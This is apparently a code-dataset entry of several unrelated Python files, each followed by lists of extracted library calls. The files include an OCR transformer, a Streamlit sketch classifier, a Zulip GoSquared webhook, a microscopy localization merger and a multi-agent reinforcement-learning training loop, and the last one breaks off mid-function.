from timm.models.swin_transformer import SwinTransformer
import utils
class SwinTransformerOCR(pl.LightningModule):
def __init__(self, cfg, tokenizer):
super().__init__()
self.cfg = cfg
self.tokenizer = tokenizer
self.encoder = CustomSwinTransformer( img_size=(cfg.height, cfg.width),
patch_size=cfg.patch_size,
in_chans=cfg.channels,
num_classes=0,
window_size=cfg.window_size,
embed_dim=cfg.encoder_dim,
depths=cfg.encoder_depth,
num_heads=cfg.encoder_heads
)
self.decoder = CustomARWrapper(
TransformerWrapper(
num_tokens=len(tokenizer),
max_seq_len=cfg.max_seq_len,
attn_layers=Decoder(
dim=cfg.decoder_dim,
depth=cfg.decoder_depth,
heads=cfg.decoder_heads,
**cfg.decoder_cfg
)),
pad_value=cfg.pad_token
)
self.bos_token = cfg.bos_token
self.eos_token = cfg.eos_token
self.max_seq_len = cfg.max_seq_len
self.temperature = cfg.temperature
def configure_optimizers(self):
optimizer = getattr(torch.optim, self.cfg.optimizer)
optimizer = optimizer(self.parameters(), lr=float(self.cfg.lr))
if not self.cfg.scheduler:
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda x: 1)
scheduler = {
'scheduler': scheduler, 'interval': "epoch", "name": "learning rate"
}
return [optimizer], [scheduler]
elif hasattr(torch.optim.lr_scheduler, self.cfg.scheduler):
scheduler = getattr(torch.optim.lr_scheduler, self.cfg.scheduler)
elif hasattr(utils, self.cfg.scheduler):
scheduler = getattr(utils, self.cfg.scheduler)
else:
raise ModuleNotFoundError
scheduler = {
'scheduler': scheduler(optimizer, **self.cfg.scheduler_param),
'interval': self.cfg.scheduler_interval,
'name': "learning rate"
}
return [optimizer], [scheduler]
def forward(self, x):
'''
x: (B, C, W, H)
labels: (B, S)
# B : batch size
# W : image width
# H : image height
# S : source sequence length
# E : hidden size
# V : vocab size
'''
encoded = self.encoder(x)
dec = self.decoder.generate(torch.LongTensor([self.bos_token]*len(x))[:, None].to(x.device), self.max_seq_len,
eos_token=self.eos_token, context=encoded, temperature=self.temperature)
return dec
def training_step(self, batch, batch_num):
x, y = batch
tgt_seq, tgt_mask = y
encoded = self.encoder(x)
loss = self.decoder(tgt_seq, mask=tgt_mask, context=encoded)
self.log("train_loss", loss)
return {'loss': loss}
def validation_step(self, batch, batch_num):
x, y = batch
tgt_seq, tgt_mask = y
encoded = self.encoder(x)
loss = self.decoder(tgt_seq, mask=tgt_mask, context=encoded)
dec = self.decoder.generate((torch.ones(x.size(0),1)*self.bos_token).long().to(x.device), self.max_seq_len,
eos_token=self.eos_token, context=encoded, temperature=self.temperature)
gt = self.tokenizer.decode(tgt_seq)
pred = self.tokenizer.decode(dec)
assert len(gt) == len(pred)
acc = sum([1 if gt[i] == pred[i] else 0 for i in range(len(gt))]) / x.size(0)
return {'val_loss': loss,
'results' : {
'gt' : gt,
'pred' : pred
},
'acc': acc
}
def validation_epoch_end(self, outputs):
val_loss = sum([x['val_loss'] for x in outputs]) / len(outputs)
acc = sum([x['acc'] for x in outputs]) / len(outputs)
wrong_cases = []
for output in outputs:
for i in range(len(output['results']['gt'])):
gt = output['results']['gt'][i]
pred = output['results']['pred'][i]
if gt != pred:
wrong_cases.append("|gt:{}/pred:{}|".format(gt, pred))
wrong_cases = random.sample(wrong_cases, min(len(wrong_cases), self.cfg.batch_size//2))
self.log('val_loss', val_loss)
self.log('accuracy', acc)
# custom text logging
self.logger.log_text("wrong_case", "___".join(wrong_cases), self.global_step)
@torch.no_grad()
def predict(self, image):
dec = self(image)
pred = self.tokenizer.decode(dec)
return pred
class CustomSwinTransformer(SwinTransformer):
def __init__(self, img_size=224, *cfg, **kwcfg):
super(CustomSwinTransformer, self).__init__(img_size=img_size, *cfg, **kwcfg)
self.height, self.width = img_size
def forward_features(self, x):
x = self.patch_embed(x)
x = self.pos_drop(x)
x = self.layers(x)
x = self.norm(x) # B L C
return x
class CustomARWrapper(AutoregressiveWrapper):
def __init__(self, *cfg, **kwcfg):
super(CustomARWrapper, self).__init__(*cfg, **kwcfg)
@torch.no_grad()
def generate(self, start_tokens, seq_len, eos_token=None, temperature=1., filter_logits_fn=top_k, filter_thres=0.9, **kwcfg):
was_training = self.net.training
num_dims = len(start_tokens.shape)
if num_dims == 1:
start_tokens = start_tokens[None, :]
b, t = start_tokens.shape
self.net.eval()
out = start_tokens
mask = kwcfg.pop('mask', None)
if mask is None:
mask = torch.full_like(out, True, dtype=torch.bool, device=out.device)
for _ in range(seq_len):
x = out[:, -self.max_seq_len:]
mask = mask[:, -self.max_seq_len:]
logits = self.net(x, mask=mask, **kwcfg)[:, -1, :]
if filter_logits_fn in {top_k, top_p}:
filtered_logits = filter_logits_fn(logits, thres=filter_thres)
probs = F.softmax(filtered_logits / temperature, dim=-1)
elif filter_logits_fn is entmax:
probs = entmax(logits / temperature, alpha=ENTMAX_ALPHA, dim=-1)
sample = torch.multinomial(probs, 1)
out = torch.cat((out, sample), dim=-1)
mask = F.pad(mask, (0, 1), value=True)
if eos_token is not None and (torch.cumsum(out == eos_token, 1)[:, -1] >= 1).all():
break
out = out[:, t:]
if num_dims == 1:
out = out.squeeze(0)
self.net.train(was_training)
return out
|
[
"torch.full_like",
"torch.multinomial",
"torch.cat",
"torch.cumsum",
"torch.optim.lr_scheduler.LambdaLR",
"torch.no_grad"
] |
[((5152, 5167), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (5165, 5167), False, 'import torch\n'), ((5846, 5861), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (5859, 5861), False, 'import torch\n'), ((1920, 1987), 'torch.optim.lr_scheduler.LambdaLR', 'torch.optim.lr_scheduler.LambdaLR', (['optimizer'], {'lr_lambda': '(lambda x: 1)'}), '(optimizer, lr_lambda=lambda x: 1)\n', (1953, 1987), False, 'import torch\n'), ((6322, 6385), 'torch.full_like', 'torch.full_like', (['out', '(True)'], {'dtype': 'torch.bool', 'device': 'out.device'}), '(out, True, dtype=torch.bool, device=out.device)\n', (6337, 6385), False, 'import torch\n'), ((6927, 6954), 'torch.multinomial', 'torch.multinomial', (['probs', '(1)'], {}), '(probs, 1)\n', (6944, 6954), False, 'import torch\n'), ((6974, 7006), 'torch.cat', 'torch.cat', (['(out, sample)'], {'dim': '(-1)'}), '((out, sample), dim=-1)\n', (6983, 7006), False, 'import torch\n'), ((7101, 7134), 'torch.cumsum', 'torch.cumsum', (['(out == eos_token)', '(1)'], {}), '(out == eos_token, 1)\n', (7113, 7134), False, 'import torch\n')]
|
import streamlit as st
from streamlit_drawable_canvas import st_canvas
from PIL import Image
import numpy as np
import torch
import torch.nn.functional as F
import torchvision.transforms as transforms
import json
# Specify canvas parameters in application
stroke_width = st.sidebar.slider(
label='Stroke width:',
min_value=1,
max_value=25,
value=3
)
drawing_mode = st.sidebar.selectbox(
label='Drawing tool:',
options=('freedraw', 'line', 'rect', 'circle', 'transform')
)
realtime_update = st.sidebar.checkbox(
label='Update in realtime',
value=True
)
# Create a canvas component
canvas_result = st_canvas(
stroke_width=stroke_width,
stroke_color='black',
update_streamlit=realtime_update,
height=400,
width=400,
drawing_mode=drawing_mode,
key='canvas',
)
@st.cache
def load_model():
model = torch.load(
f='quickdraw/models/model.pt',
map_location=torch.device('cpu')
)
return model
model = load_model()
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.9720, 0.9720, 0.9720),
(0.1559, 0.1559, 0.1559)) # Normalize with the mean and std of the whole dataset
])
# Dictionary to map id to name of the class
with open('quickdraw/categories/id_to_class.json') as file:
id_to_class = json.load(file)
if canvas_result.image_data is not None:
image = canvas_result.image_data
# Convert RGBA image to RGB (PIL doesn't convert as I want)
image_rgb = Image.fromarray(np.uint8(image)).convert(mode='P')
image_rgb = np.array(image_rgb)[:, :, np.newaxis]
image_rgb = np.repeat(image_rgb, repeats=3, axis=2)
# Use the same transformation used in training and add batch dimension
image_rgb = torch.unsqueeze(transform(image_rgb), dim=0)
# Compute logits
y_lgts = model(image_rgb)
# Compute scores
y_prob = F.softmax(y_lgts, dim=1)
# Compute the top 3 predictions
top_3 = torch.topk(y_prob, k=3)
preds = top_3.indices.numpy().flatten()
probs = top_3.values.detach().numpy().flatten()
labels = [id_to_class[str(i)] for i in preds]
predictions = dict(zip(labels, probs))
st.write('**Top 3 predictions:**')
st.write(predictions)
|
[
"streamlit.sidebar.slider",
"streamlit_drawable_canvas.st_canvas",
"json.load",
"torch.topk",
"numpy.uint8",
"streamlit.sidebar.checkbox",
"streamlit.write",
"torch.nn.functional.softmax",
"torchvision.transforms.ToTensor",
"streamlit.sidebar.selectbox",
"numpy.array",
"torch.device",
"torchvision.transforms.Normalize",
"numpy.repeat"
] |
[((275, 351), 'streamlit.sidebar.slider', 'st.sidebar.slider', ([], {'label': '"""Stroke width:"""', 'min_value': '(1)', 'max_value': '(25)', 'value': '(3)'}), "(label='Stroke width:', min_value=1, max_value=25, value=3)\n", (292, 351), True, 'import streamlit as st\n'), ((387, 495), 'streamlit.sidebar.selectbox', 'st.sidebar.selectbox', ([], {'label': '"""Drawing tool:"""', 'options': "('freedraw', 'line', 'rect', 'circle', 'transform')"}), "(label='Drawing tool:', options=('freedraw', 'line',\n 'rect', 'circle', 'transform'))\n", (407, 495), True, 'import streamlit as st\n'), ((521, 580), 'streamlit.sidebar.checkbox', 'st.sidebar.checkbox', ([], {'label': '"""Update in realtime"""', 'value': '(True)'}), "(label='Update in realtime', value=True)\n", (540, 580), True, 'import streamlit as st\n'), ((637, 803), 'streamlit_drawable_canvas.st_canvas', 'st_canvas', ([], {'stroke_width': 'stroke_width', 'stroke_color': '"""black"""', 'update_streamlit': 'realtime_update', 'height': '(400)', 'width': '(400)', 'drawing_mode': 'drawing_mode', 'key': '"""canvas"""'}), "(stroke_width=stroke_width, stroke_color='black', update_streamlit\n =realtime_update, height=400, width=400, drawing_mode=drawing_mode, key\n ='canvas')\n", (646, 803), False, 'from streamlit_drawable_canvas import st_canvas\n'), ((1362, 1377), 'json.load', 'json.load', (['file'], {}), '(file)\n', (1371, 1377), False, 'import json\n'), ((1663, 1702), 'numpy.repeat', 'np.repeat', (['image_rgb'], {'repeats': '(3)', 'axis': '(2)'}), '(image_rgb, repeats=3, axis=2)\n', (1672, 1702), True, 'import numpy as np\n'), ((1925, 1949), 'torch.nn.functional.softmax', 'F.softmax', (['y_lgts'], {'dim': '(1)'}), '(y_lgts, dim=1)\n', (1934, 1949), True, 'import torch.nn.functional as F\n'), ((1998, 2021), 'torch.topk', 'torch.topk', (['y_prob'], {'k': '(3)'}), '(y_prob, k=3)\n', (2008, 2021), False, 'import torch\n'), ((2225, 2259), 'streamlit.write', 'st.write', (['"""**Top 3 predictions:**"""'], {}), "('**Top 3 predictions:**')\n", (2233, 2259), True, 'import streamlit as st\n'), ((2264, 2285), 'streamlit.write', 'st.write', (['predictions'], {}), '(predictions)\n', (2272, 2285), True, 'import streamlit as st\n'), ((1046, 1067), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (1065, 1067), True, 'import torchvision.transforms as transforms\n'), ((1078, 1147), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['(0.972, 0.972, 0.972)', '(0.1559, 0.1559, 0.1559)'], {}), '((0.972, 0.972, 0.972), (0.1559, 0.1559, 0.1559))\n', (1098, 1147), True, 'import torchvision.transforms as transforms\n'), ((1609, 1628), 'numpy.array', 'np.array', (['image_rgb'], {}), '(image_rgb)\n', (1617, 1628), True, 'import numpy as np\n'), ((938, 957), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (950, 957), False, 'import torch\n'), ((1558, 1573), 'numpy.uint8', 'np.uint8', (['image'], {}), '(image)\n', (1566, 1573), True, 'import numpy as np\n')]
|
import numpy as np
def float_ndarray_to_dict(arr):
return np_arr_to_dict(arr)
def dict_to_float_ndarray(string):
return dict_to_np_arr(string)
def identity(e):
return e
def float_to_string(num):
return str(num)
def string_to_float(string):
return float(string)
def np_arr_to_dict(arr):
return {'arr': arr.tolist(),
'shape':list(arr.shape),
'dtype':str(arr.dtype)
}
def dict_to_np_arr(data):
arr, shape, dtype = data['arr'], data['shape'], data['dtype']
return np.array(arr, dtype=dtype).reshape(tuple(shape))
|
[
"numpy.array"
] |
[((519, 545), 'numpy.array', 'np.array', (['arr'], {'dtype': 'dtype'}), '(arr, dtype=dtype)\n', (527, 545), True, 'import numpy as np\n')]
|
from typing import Any, Dict, Optional
from django.http import HttpRequest, HttpResponse
from django.utils.translation import ugettext as _
from zerver.decorator import api_key_only_webhook_view
from zerver.lib.request import REQ, has_request_variables
from zerver.lib.response import json_error, json_success
from zerver.lib.webhooks.common import check_send_webhook_message
from zerver.models import UserProfile
BODY_TEMPLATE = '[{website_name}]({website_url}) has {user_num} visitors online.'
@api_key_only_webhook_view('GoSquared')
@has_request_variables
def api_gosquared_webhook(request: HttpRequest, user_profile: UserProfile,
payload: Dict[str, Dict[str, Any]]=REQ(argument_type='body')) -> HttpResponse:
domain_name = payload['siteDetails']['domain']
user_num = payload['concurrents']
user_acc = payload['siteDetails']['acct']
acc_url = 'https://www.gosquared.com/now/' + user_acc
body = BODY_TEMPLATE.format(website_name=domain_name, website_url=acc_url, user_num=user_num)
topic = 'GoSquared - {website_name}'.format(website_name=domain_name)
check_send_webhook_message(request, user_profile, topic, body)
return json_success()
|
[
"zerver.lib.response.json_success",
"zerver.lib.webhooks.common.check_send_webhook_message",
"zerver.decorator.api_key_only_webhook_view",
"zerver.lib.request.REQ"
] |
[((501, 539), 'zerver.decorator.api_key_only_webhook_view', 'api_key_only_webhook_view', (['"""GoSquared"""'], {}), "('GoSquared')\n", (526, 539), False, 'from zerver.decorator import api_key_only_webhook_view\n'), ((699, 724), 'zerver.lib.request.REQ', 'REQ', ([], {'argument_type': '"""body"""'}), "(argument_type='body')\n", (702, 724), False, 'from zerver.lib.request import REQ, has_request_variables\n'), ((1113, 1175), 'zerver.lib.webhooks.common.check_send_webhook_message', 'check_send_webhook_message', (['request', 'user_profile', 'topic', 'body'], {}), '(request, user_profile, topic, body)\n', (1139, 1175), False, 'from zerver.lib.webhooks.common import check_send_webhook_message\n'), ((1187, 1201), 'zerver.lib.response.json_success', 'json_success', ([], {}), '()\n', (1199, 1201), False, 'from zerver.lib.response import json_error, json_success\n')]
|
import z3c.baseregistry.baseregistry
import asm.cms.page
import grok
import zope.component
import zope.interface
import zope.publisher.browser
import zope.publisher.interfaces.browser
import zope.intid.interfaces
class CMS(grok.Application, asm.cms.page.Page):
zope.interface.implements(asm.cms.interfaces.ICMS)
# Keep this here to support old instances.
type = 'htmlpage'
def __init__(self, type='htmlpage'):
super(CMS, self).__init__(type)
@grok.subscribe(zope.intid.interfaces.IIntIds, grok.IObjectAddedEvent)
def cleanup_initial_edition(obj, event):
# This is a work-around for an ordering problem: eventually the initial
# editions are created before the intid utility is registered. This cleans
# up that mess and registers all editions that exist in the CMS directly.
cms = obj.__parent__.__parent__
if not asm.cms.interfaces.ICMS.providedBy(cms):
return
for edition in cms.values():
obj.register(edition)
obj.register(cms)
class CMSProfile(grok.Adapter):
grok.context(CMS)
grok.provides(asm.cms.interfaces.IProfileSelection)
def set_name(self, value):
value = zope.component.getUtility(asm.cms.interfaces.IProfile,
name=value)
sm = self.context.getSiteManager()
bases = (x for x in sm.__bases__
if not asm.cms.interfaces.IProfile.providedBy(x))
sm.__bases__ = (value,) + tuple(bases)
def get_name(self):
sm = self.context.getSiteManager()
for profile in sm.__bases__:
if not asm.cms.interfaces.IProfile.providedBy(profile):
continue
break
else:
return None
for name, reg_profile in zope.component.getUtilitiesFor(
asm.cms.interfaces.IProfile):
if reg_profile is profile:
return name
name = property(fget=get_name, fset=set_name)
class Profile(z3c.baseregistry.baseregistry.BaseComponents):
zope.interface.implements(asm.cms.interfaces.IProfile)
def __init__(self, name):
super(Profile, self).__init__(zope.component.globalSiteManager, name)
|
[
"grok.context",
"grok.provides",
"grok.subscribe"
] |
[((474, 543), 'grok.subscribe', 'grok.subscribe', (['zope.intid.interfaces.IIntIds', 'grok.IObjectAddedEvent'], {}), '(zope.intid.interfaces.IIntIds, grok.IObjectAddedEvent)\n', (488, 543), False, 'import grok\n'), ((1044, 1061), 'grok.context', 'grok.context', (['CMS'], {}), '(CMS)\n', (1056, 1061), False, 'import grok\n'), ((1066, 1117), 'grok.provides', 'grok.provides', (['asm.cms.interfaces.IProfileSelection'], {}), '(asm.cms.interfaces.IProfileSelection)\n', (1079, 1117), False, 'import grok\n')]
|
#!/usr/bin/env python
"""
Merges the intermediate localization files into a single
localization file.
Hazen 08/17
"""
import glob
import os
from xml.etree import ElementTree
import storm_analysis.sa_library.readinsight3 as readinsight3
import storm_analysis.sa_library.writeinsight3 as writeinsight3
def mergeAnalysis(dir_name, bin_base_name, extensions = [".bin"]):
# Create Insight3 file writers.
i3_out = []
for ext in extensions:
i3_out.append(writeinsight3.I3Writer(bin_base_name + ext))
# Find all the job*.xml files.
job_xml_files = glob.glob(dir_name + "job*.xml")
# Sort job files.
job_xml_files = sorted(job_xml_files, key = lambda x: int(os.path.splitext(os.path.basename(x))[0].split("_")[1]))
# Check for corresponding mlist.bin files.
metadata = None
last_frame = 0
for i in range(len(job_xml_files)):
job_complete = True
for j, ext in enumerate(extensions):
mlist_name = dir_name + "p_" + str(i+1) + "_mlist" + ext
if os.path.exists(mlist_name) and readinsight3.checkStatus(mlist_name):
# Load metadata from the first file.
if (i == 0) and (j == 0):
metadata = readinsight3.loadI3Metadata(mlist_name)
# Read localizations.
i3_data = readinsight3.loadI3File(mlist_name, verbose = False)
# Check for empty file.
if (i3_data.size == 0):
print("No localizations found in", mlist_name)
else:
# Print frame range covered.
if (j == 0):
last_frame = i3_data["fr"][-1]
print(i3_data["fr"][0], last_frame, mlist_name)
# Add localizations to the output file.
i3_out[j].addMolecules(i3_data)
else:
job_complete = False
break
if not job_complete:
print("Merge failed because", job_xml_files[i], "is incomplete.")
for j, ext in enumerate(extensions):
i3_out[j].close()
os.remove(bin_base_name + ext)
assert(False)
if metadata is None:
print("No metadata found.")
for i3w in i3_out:
i3w.close()
else:
# Fix movie length node based on the last frame of the last molecule.
metadata.find("movie").find("movie_l").text = str(last_frame)
# Also need to fix analysis end points. We are assuming that the
# entire movie was analyzed.
metadata.find("settings").find("start_frame").text = "-1"
metadata.find("settings").find("max_frame").text = "-1"
for i3w in i3_out:
i3w.closeWithMetadata(ElementTree.tostring(metadata, 'ISO-8859-1'))
if (__name__ == "__main__"):
import argparse
parser = argparse.ArgumentParser(description = 'Merge analysis results from parallel analysis.')
parser.add_argument('--working_dir', dest='wdir', type=str, required=True,
help = "The name of the analysis working directory.")
parser.add_argument('--bin_base_name', dest='merged', type=str, required=True,
help = "The base name of the merged localization file (i.e. without .bin extension)")
parser.add_argument('--ext', dest='ext', type=str, required=False, default=[".bin"], nargs = "*",
help = "The name of the extensions, if any.")
args = parser.parse_args()
mergeAnalysis(args.wdir, args.merged, args.ext)
|
[
"storm_analysis.sa_library.readinsight3.checkStatus",
"os.remove",
"argparse.ArgumentParser",
"os.path.basename",
"storm_analysis.sa_library.writeinsight3.I3Writer",
"os.path.exists",
"storm_analysis.sa_library.readinsight3.loadI3File",
"glob.glob",
"storm_analysis.sa_library.readinsight3.loadI3Metadata",
"xml.etree.ElementTree.tostring"
] |
[((575, 607), 'glob.glob', 'glob.glob', (["(dir_name + 'job*.xml')"], {}), "(dir_name + 'job*.xml')\n", (584, 607), False, 'import glob\n'), ((2913, 3003), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Merge analysis results from parallel analysis."""'}), "(description=\n 'Merge analysis results from parallel analysis.')\n", (2936, 3003), False, 'import argparse\n'), ((474, 517), 'storm_analysis.sa_library.writeinsight3.I3Writer', 'writeinsight3.I3Writer', (['(bin_base_name + ext)'], {}), '(bin_base_name + ext)\n', (496, 517), True, 'import storm_analysis.sa_library.writeinsight3 as writeinsight3\n'), ((1036, 1062), 'os.path.exists', 'os.path.exists', (['mlist_name'], {}), '(mlist_name)\n', (1050, 1062), False, 'import os\n'), ((1067, 1103), 'storm_analysis.sa_library.readinsight3.checkStatus', 'readinsight3.checkStatus', (['mlist_name'], {}), '(mlist_name)\n', (1091, 1103), True, 'import storm_analysis.sa_library.readinsight3 as readinsight3\n'), ((1337, 1387), 'storm_analysis.sa_library.readinsight3.loadI3File', 'readinsight3.loadI3File', (['mlist_name'], {'verbose': '(False)'}), '(mlist_name, verbose=False)\n', (1360, 1387), True, 'import storm_analysis.sa_library.readinsight3 as readinsight3\n'), ((2169, 2199), 'os.remove', 'os.remove', (['(bin_base_name + ext)'], {}), '(bin_base_name + ext)\n', (2178, 2199), False, 'import os\n'), ((2801, 2845), 'xml.etree.ElementTree.tostring', 'ElementTree.tostring', (['metadata', '"""ISO-8859-1"""'], {}), "(metadata, 'ISO-8859-1')\n", (2821, 2845), False, 'from xml.etree import ElementTree\n'), ((1232, 1271), 'storm_analysis.sa_library.readinsight3.loadI3Metadata', 'readinsight3.loadI3Metadata', (['mlist_name'], {}), '(mlist_name)\n', (1259, 1271), True, 'import storm_analysis.sa_library.readinsight3 as readinsight3\n'), ((710, 729), 'os.path.basename', 'os.path.basename', (['x'], {}), '(x)\n', (726, 729), False, 'import os\n')]
|
import logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def handler(event, context):
logger.info("Hello World!")
|
[
"logging.getLogger"
] |
[((25, 44), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (42, 44), False, 'import logging\n')]
|
from quickdraw import QuickDrawDataGroup
from tqdm import tqdm
import os
def main():
"""
Download the images and create the necessary directories to store them.
Notes
-----
- See https://pytorch.org/vision/stable/datasets.html#torchvision.datasets.ImageFolder to see
how images must be arranged for the Dataset.
"""
if not os.path.exists('images'):
os.mkdir('images')
with open('categories/categories.txt') as file:
names = [name.replace('\n', '') for name in file.readlines()]
for name in tqdm(names):
images = QuickDrawDataGroup(
name,
recognized=True,
max_drawings=1000,
cache_dir='bin-images',
print_messages=False
)
name = name.replace(' ', '-')
path = f'images/{name}/'
if not os.path.exists(path):
os.mkdir(path)
for drawing in images.drawings:
drawing.image.save(f'images/{name}/{drawing.key_id}.jpg')
if __name__ == '__main__':
main()
|
[
"os.mkdir",
"tqdm.tqdm",
"os.path.exists",
"quickdraw.QuickDrawDataGroup"
] |
[((552, 563), 'tqdm.tqdm', 'tqdm', (['names'], {}), '(names)\n', (556, 563), False, 'from tqdm import tqdm\n'), ((359, 383), 'os.path.exists', 'os.path.exists', (['"""images"""'], {}), "('images')\n", (373, 383), False, 'import os\n'), ((393, 411), 'os.mkdir', 'os.mkdir', (['"""images"""'], {}), "('images')\n", (401, 411), False, 'import os\n'), ((582, 693), 'quickdraw.QuickDrawDataGroup', 'QuickDrawDataGroup', (['name'], {'recognized': '(True)', 'max_drawings': '(1000)', 'cache_dir': '"""bin-images"""', 'print_messages': '(False)'}), "(name, recognized=True, max_drawings=1000, cache_dir=\n 'bin-images', print_messages=False)\n", (600, 693), False, 'from quickdraw import QuickDrawDataGroup\n'), ((849, 869), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (863, 869), False, 'import os\n'), ((883, 897), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (891, 897), False, 'import os\n')]
|
import math, random, copy
import numpy as np
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
import torch.nn.functional as F
from DGN import DGN
from buffer import ReplayBuffer
from surviving import Surviving
from config import *
USE_CUDA = torch.cuda.is_available()
env = Surviving(n_agent = 100)
n_ant = env.n_agent
observation_space = env.len_obs
n_actions = env.n_action
buff = ReplayBuffer(capacity)
model = DGN(n_ant,observation_space,hidden_dim,n_actions)
model_tar = DGN(n_ant,observation_space,hidden_dim,n_actions)
model = model.cuda()
model_tar = model_tar.cuda()
optimizer = optim.Adam(model.parameters(), lr = 0.0001)
O = np.ones((batch_size,n_ant,observation_space))
Next_O = np.ones((batch_size,n_ant,observation_space))
Matrix = np.ones((batch_size,n_ant,n_ant))
Next_Matrix = np.ones((batch_size,n_ant,n_ant))
f = open('r.txt','w')
while i_episode<n_episode:
if i_episode > 100:
epsilon -= 0.0004
if epsilon < 0.1:
epsilon = 0.1
i_episode+=1
steps = 0
obs, adj = env.reset()
while steps < max_step:
steps+=1
action=[]
q = model(torch.Tensor(np.array([obs])).cuda(), torch.Tensor(adj).cuda())[0]
for i in range(n_ant):
if np.random.rand() < epsilon:
a = np.random.randint(n_actions)
else:
a = q[i].argmax().item()
action.append(a)
next_obs, next_adj, reward, terminated = env.step(action)
buff.add(np.array(obs),action,reward,np.array(next_obs),adj,next_adj,terminated)
obs = next_obs
adj = next_adj
score += sum(reward)
if i_episode%20==0:
print(score/2000)
f.write(str(score/2000)+'\n')
score = 0
if i_episode < 100:
continue
for e in range(n_epoch):
batch = buff.getBatch(batch_size)
for j in range(batch_size):
sample = batch[j]
O[j] = sample[0]
Next_O[j] = sample[3]
Matrix[j] = sample[4]
Next_Matrix[j] = sample[5]
q_values = model(torch.Tensor(O).cuda(), torch.Tensor(Matrix).cuda())
target_q_values = model_tar(torch.Tensor(Next_O).cuda(), torch.Tensor(Next_Matrix).cuda()).max(dim = 2)[0]
target_q_values = np.array(target_q_values.cpu().data)
expected_q = np.array(q_values.cpu().data)
for j in range(batch_size):
sample = batch[j]
for i in range(n_ant):
expected_q[j][i][sample[1][i]] = sample[2][i] + (1-sample[6])*GAMMA*target_q_values[j][i]
loss = (q_values - torch.Tensor(expected_q).cuda()).pow(2).mean()
optimizer.zero_grad()
loss.backward()
optimizer.step()
if i_episode%5 == 0:
model_tar.load_state_dict(model.state_dict())
|
[
"surviving.Surviving",
"numpy.ones",
"DGN.DGN",
"numpy.random.randint",
"torch.cuda.is_available",
"numpy.array",
"torch.Tensor",
"numpy.random.rand",
"buffer.ReplayBuffer"
] |
[((346, 371), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (369, 371), False, 'import torch\n'), ((379, 401), 'surviving.Surviving', 'Surviving', ([], {'n_agent': '(100)'}), '(n_agent=100)\n', (388, 401), False, 'from surviving import Surviving\n'), ((489, 511), 'buffer.ReplayBuffer', 'ReplayBuffer', (['capacity'], {}), '(capacity)\n', (501, 511), False, 'from buffer import ReplayBuffer\n'), ((520, 572), 'DGN.DGN', 'DGN', (['n_ant', 'observation_space', 'hidden_dim', 'n_actions'], {}), '(n_ant, observation_space, hidden_dim, n_actions)\n', (523, 572), False, 'from DGN import DGN\n'), ((582, 634), 'DGN.DGN', 'DGN', (['n_ant', 'observation_space', 'hidden_dim', 'n_actions'], {}), '(n_ant, observation_space, hidden_dim, n_actions)\n', (585, 634), False, 'from DGN import DGN\n'), ((743, 790), 'numpy.ones', 'np.ones', (['(batch_size, n_ant, observation_space)'], {}), '((batch_size, n_ant, observation_space))\n', (750, 790), True, 'import numpy as np\n'), ((798, 845), 'numpy.ones', 'np.ones', (['(batch_size, n_ant, observation_space)'], {}), '((batch_size, n_ant, observation_space))\n', (805, 845), True, 'import numpy as np\n'), ((853, 888), 'numpy.ones', 'np.ones', (['(batch_size, n_ant, n_ant)'], {}), '((batch_size, n_ant, n_ant))\n', (860, 888), True, 'import numpy as np\n'), ((901, 936), 'numpy.ones', 'np.ones', (['(batch_size, n_ant, n_ant)'], {}), '((batch_size, n_ant, n_ant))\n', (908, 936), True, 'import numpy as np\n'), ((1469, 1482), 'numpy.array', 'np.array', (['obs'], {}), '(obs)\n', (1477, 1482), True, 'import numpy as np\n'), ((1497, 1515), 'numpy.array', 'np.array', (['next_obs'], {}), '(next_obs)\n', (1505, 1515), True, 'import numpy as np\n'), ((1273, 1289), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (1287, 1289), True, 'import numpy as np\n'), ((1309, 1337), 'numpy.random.randint', 'np.random.randint', (['n_actions'], {}), '(n_actions)\n', (1326, 1337), True, 'import numpy as np\n'), ((1954, 1969), 'torch.Tensor', 'torch.Tensor', (['O'], {}), '(O)\n', (1966, 1969), False, 'import torch\n'), ((1978, 1998), 'torch.Tensor', 'torch.Tensor', (['Matrix'], {}), '(Matrix)\n', (1990, 1998), False, 'import torch\n'), ((1213, 1230), 'torch.Tensor', 'torch.Tensor', (['adj'], {}), '(adj)\n', (1225, 1230), False, 'import torch\n'), ((1188, 1203), 'numpy.array', 'np.array', (['[obs]'], {}), '([obs])\n', (1196, 1203), True, 'import numpy as np\n'), ((2037, 2057), 'torch.Tensor', 'torch.Tensor', (['Next_O'], {}), '(Next_O)\n', (2049, 2057), False, 'import torch\n'), ((2066, 2091), 'torch.Tensor', 'torch.Tensor', (['Next_Matrix'], {}), '(Next_Matrix)\n', (2078, 2091), False, 'import torch\n'), ((2416, 2440), 'torch.Tensor', 'torch.Tensor', (['expected_q'], {}), '(expected_q)\n', (2428, 2440), False, 'import torch\n')]
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
from __future__ import unicode_literals # at top of module
import argparse
import logging
import sys
logging.basicConfig(
format='%(levelname)s(%(filename)s:%(lineno)d): %(message)s')
def levenshtein(u, v):
prev = None
curr = [0] + list(range(1, len(v) + 1))
# Operations: (SUB, DEL, INS)
prev_ops = None
curr_ops = [(0, 0, i) for i in range(len(v) + 1)]
for x in range(1, len(u) + 1):
prev, curr = curr, [x] + ([None] * len(v))
prev_ops, curr_ops = curr_ops, [(0, x, 0)] + ([None] * len(v))
for y in range(1, len(v) + 1):
delcost = prev[y] + 1
addcost = curr[y - 1] + 1
subcost = prev[y - 1] + int(u[x - 1] != v[y - 1])
curr[y] = min(subcost, delcost, addcost)
if curr[y] == subcost:
